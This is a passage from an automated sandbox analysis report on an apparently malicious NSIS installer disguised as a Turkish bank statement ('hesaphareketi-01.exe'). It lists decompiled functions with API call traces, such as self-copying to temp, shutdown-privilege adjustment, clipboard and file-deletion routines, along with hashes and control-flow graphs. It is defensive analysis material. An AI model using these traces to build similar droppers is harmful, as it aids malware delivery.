                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040340C
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403413
                                                                                      • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 0040342F
                                                                                      • GetCommandLineW.KERNEL32(Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403444
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\hesaphareketi-01.exe",00000000,?,00000006,00000008,0000000A), ref: 00403457
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\hesaphareketi-01.exe",00000020,?,00000006,00000008,0000000A), ref: 0040347E
                                                                                        • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                        • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035B8
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C9
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035D5
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E9
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035F1
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403602
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040360A
                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040361E
                                                                                        • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E9
                                                                                      • ExitProcess.KERNEL32 ref: 0040370A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040371D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040372C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403737
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\hesaphareketi-01.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403743
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040375F
                                                                                      • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,00000008,?,00000006,00000008,0000000A), ref: 004037B9
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\hesaphareketi-01.exe,0042AA08,00000001,?,00000006,00000008,0000000A), ref: 004037CD
                                                                                      • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000,?,00000006,00000008,0000000A), ref: 004037FA
                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403829
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403830
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403845
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403868
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 0040388D
                                                                                      • ExitProcess.KERNEL32 ref: 004038B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically$C:\Users\user\Desktop$C:\Users\user\Desktop\hesaphareketi-01.exe$Cellulipetally Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 2488574733-3272610396
                                                                                      • Opcode ID: 5fbb855ab9531fef191cbbcaf928c14bc3d0a422fd09daf3f3abe40e76e76a55
                                                                                      • Instruction ID: 7b86b6c626ebcb02b9d5dbe90ebec93722fb19806190c38ba91b5de258dcc2d7
                                                                                      • Opcode Fuzzy Hash: 5fbb855ab9531fef191cbbcaf928c14bc3d0a422fd09daf3f3abe40e76e76a55
                                                                                      • Instruction Fuzzy Hash: 0CD12571500310ABD720BF759D45A2B3AACEB4070AF11487FF981B62E1DB7D8E45876E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 405425-405440 140 405446-40550d GetDlgItem * 3 call 40424c call 404b83 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 4055cf-4055d6 139->141 159 40552b-40552e 140->159 160 40550f-405529 SendMessageW * 2 140->160 143 405600-40560d 141->143 144 4055d8-4055fa GetDlgItem CreateThread CloseHandle 141->144 146 40562b-405635 143->146 147 40560f-405615 143->147 144->143 151 405637-40563d 146->151 152 40568b-40568f 146->152 149 405650-405659 call 40427e 147->149 150 405617-405626 ShowWindow * 2 call 40424c 147->150 163 40565e-405662 149->163 150->146 156 405665-405675 ShowWindow 151->156 157 40563f-40564b call 4041f0 151->157 152->149 154 405691-405697 152->154 154->149 161 405699-4056ac SendMessageW 154->161 164 405685-405686 call 4041f0 156->164 165 405677-405680 call 4052e6 156->165 157->149 168 405530-40553c SendMessageW 159->168 169 40553e-405555 call 404217 159->169 160->159 170 4056b2-4056dd CreatePopupMenu call 4062a4 AppendMenuW 161->170 171 4057ae-4057b0 161->171 164->152 165->164 168->169 178 405557-40556b ShowWindow 169->178 179 40558b-4055ac GetDlgItem SendMessageW 169->179 176 4056f2-405707 TrackPopupMenu 170->176 177 4056df-4056ef GetWindowRect 170->177 171->163 176->171 181 40570d-405724 176->181 177->176 182 40557a 178->182 183 40556d-405578 ShowWindow 178->183 179->171 180 4055b2-4055ca SendMessageW * 2 179->180 180->171 184 405729-405744 SendMessageW 181->184 185 405580-405586 call 40424c 182->185 183->185 184->184 186 405746-405769 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 40576b-405792 SendMessageW 186->188 188->188 189 405794-4057a8 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                                      • GetClientRect.USER32(?,?), ref: 004054CF
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                                        • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004055FA
                                                                                      • ShowWindow.USER32(00000000), ref: 0040561E
                                                                                      • ShowWindow.USER32(00010474,00000008), ref: 00405623
                                                                                      • ShowWindow.USER32(00000008), ref: 0040566D
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                                      • CreatePopupMenu.USER32 ref: 004056B2
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                                      • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405747
                                                                                      • EmptyClipboard.USER32 ref: 0040574D
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                                      • CloseClipboard.USER32 ref: 004057A8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {
                                                                                      • API String ID: 590372296-366298937
                                                                                      • Opcode ID: f558cd562b561a2b708a6e47d27340253300c3298c9f6e828ca62f216568898c
                                                                                      • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                                                      • Opcode Fuzzy Hash: f558cd562b561a2b708a6e47d27340253300c3298c9f6e828ca62f216568898c
                                                                                      • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 4227406936-0
                                                                                      • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                      • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                                      • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                                                      • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405990 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 699 405990-4059b6 call 405c5b 702 4059b8-4059ca DeleteFileW 699->702 703 4059cf-4059d6 699->703 704 405b4c-405b50 702->704 705 4059d8-4059da 703->705 706 4059e9-4059f9 call 406282 703->706 707 4059e0-4059e3 705->707 708 405afa-405aff 705->708 712 405a08-405a09 call 405b9f 706->712 713 4059fb-405a06 lstrcatW 706->713 707->706 707->708 708->704 711 405b01-405b04 708->711 714 405b06-405b0c 711->714 715 405b0e-405b16 call 4065c5 711->715 716 405a0e-405a12 712->716 713->716 714->704 715->704 722 405b18-405b2c call 405b53 call 405948 715->722 720 405a14-405a1c 716->720 721 405a1e-405a24 lstrcatW 716->721 720->721 723 405a29-405a45 lstrlenW FindFirstFileW 720->723 721->723 739 405b44-405b47 call 4052e6 722->739 740 405b2e-405b31 722->740 724 405a4b-405a53 723->724 725 405aef-405af3 723->725 727 405a73-405a87 call 406282 724->727 728 405a55-405a5d 724->728 725->708 730 405af5 725->730 741 405a89-405a91 727->741 742 405a9e-405aa9 call 405948 727->742 731 405ad2-405ae2 FindNextFileW 728->731 732 405a5f-405a67 728->732 730->708 731->724 738 405ae8-405ae9 FindClose 731->738 732->727 735 405a69-405a71 732->735 735->727 735->731 738->725 739->704 740->714 743 405b33-405b42 call 4052e6 call 406048 740->743 741->731 744 405a93-405a9c call 405990 741->744 752 405aca-405acd call 4052e6 742->752 753 405aab-405aae 742->753 743->704 744->731 752->731 756 405ab0-405ac0 call 4052e6 call 406048 753->756 757 405ac2-405ac8 753->757 756->731 757->731
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 004059B9
                                                                                      • lstrcatW.KERNEL32(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,\*.*), ref: 00405A01
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405A2A
                                                                                      • FindFirstFileW.KERNELBASE(Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,?,0040A014,?,Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban,?,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405A3A
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$C:\Users\user\AppData\Local\Temp\$Idedramaerne\retlede\sheepsplit\terebinthinate\ishjs\gnidetryk.ban$\*.*
                                                                                      • API String ID: 2035342205-3279201731
                                                                                      • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                                      • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                                                      • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                                                      • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004065C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420), ref: 004065D0
                                                                                      • FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\
                                                                                      • API String ID: 2295610775-3404278061
                                                                                      • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                      • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                                                      • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                      • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically, xrefs: 004021BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically
                                                                                      • API String ID: 542301482-481820323
                                                                                      • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                      • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                                      • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                      • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                      • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                                      • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                      • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
